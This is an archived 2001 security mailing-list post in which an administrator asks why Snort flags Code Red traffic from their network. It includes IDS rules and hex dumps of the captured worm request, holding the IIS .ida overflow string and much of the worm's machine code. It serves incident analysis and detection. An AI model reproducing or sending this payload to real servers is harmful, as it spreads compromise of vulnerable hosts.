Security Incidents mailing list archives

Code Red hits from inside network?

From: "Nuno Fernandes" <nfernandes () real-secure com>
Date: Wed, 1 Aug 2001 21:33:52 -0400
Hi,

    Our snort IDS has been picking up odd traffic from our global IP address
of the firewall. 199.105.208.201 is our NAT IP and snort is picking up
systems from our inside network sending code red worm traffic out. The real
strange this is that we checked the systems and they are Windows NT
workstations with no IIS on them. I'm sure the rules are right since all I
did was change the msg and the port to EXTERNAL. I pasted what we got and
wondering if anyone else seen this. Also here are my rules.

alert TCP $INTERNAL any <> $EXTERNAL 80 (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".idq?"; classtype:
system-or-info-attempt; reference: arachnids,552;)

alert TCP $INTERNAL <> $EXTERNAL 80  (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".ida?"; classtype:
system-or-info-attempt; reference: arachnids,552;)


----------------------------------------------------------------------------
--
#(2 - 60843) [2001-08-01 13:25:23] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 207.251.72.172 -> 199.105.208.201
      hlen=5 TOS=16 dlen=332 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 46247  flags=***AP*** seq=1013502254
      ack=831497185 off=5 res=0 win=7988 urp=0 chksum=0
Payload:  length = 292

000 : 53 C2 BC 00 2F 64 65 66 61 75 6C 74 2E 69 64 61   S.../default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   N.090.858.bd3.80
100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
120 : 31 00 30 39                                       1.09
----------------------------------------------------------------------------
--
#(2 - 60997) [2001-08-01 14:46:32] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
      hlen=5 TOS=16 dlen=1547 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 57948  flags=***AP*** seq=583521197
      ack=3604700076 off=5 res=0 win=8280 urp=0 chksum=0
Payload:  length = 1507

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q&lt;..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B&lt;..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....&lt;.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
560 : 08 8B 51 10 5F 6F 77 6E 65 72 73 22 20 74 61 72   ..Q._owners&quot;
tar
570 : 67 65 74 3D 22 5F 74 6F 70 22 20 63 6F 6F 72 64   get=&quot;_top&quot;
coord
580 : 73 3D 22 30 2C 30 2C 20 39 36 2C 31 30 22 20 6F   s=&quot;0,0,
96,10&quot; o
590 : 6E 4D 6F 75 73 65 4F 76 65 72 3D 22 6C 69 28 27
nMouseOver=&quot;li('
5a0 : 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F 6E 2E 67   r', '/arrow_on.g
5b0 : 69 66 27 29 3B 72 65 74 75 72 6E 20 74 72 75 65   if');return true
5c0 : 3B 22 20 6F 6E 4D 6F 75 73 65 4F 75 74 3D 22 6C   ;&quot;
onMouseOut=&quot;l
5d0 : 69 28 27 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F   i('r', '/arrow_o
5e0 : 66 66 2E                                          ff.
----------------------------------------------------------------------------
--
#(2 - 60996) [2001-08-01 14:46:32] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
      hlen=5 TOS=16 dlen=1420 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 57948  flags=***AP*** seq=583521197
      ack=3604698569 off=5 res=0 win=8280 urp=0 chksum=0
Payload:  length = 1380

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q&lt;..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B&lt;..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....&lt;.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
560 : 08 8B 51 10                                       ..Q.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Current thread:

Code Red hits Powers, James L. (Aug 01)
- <Possible follow-ups>
- RE: Code Red hits Portnoy, Gary (Aug 01)
  - Re: Code Red hits Michael Tavares (Aug 01)
- RE: Code Red hits Bryan Willis (Aug 01)
- RE: Code Red hits Dave Salovesh (Aug 01)
  - Code Red hits from inside network? Nuno Fernandes (Aug 01)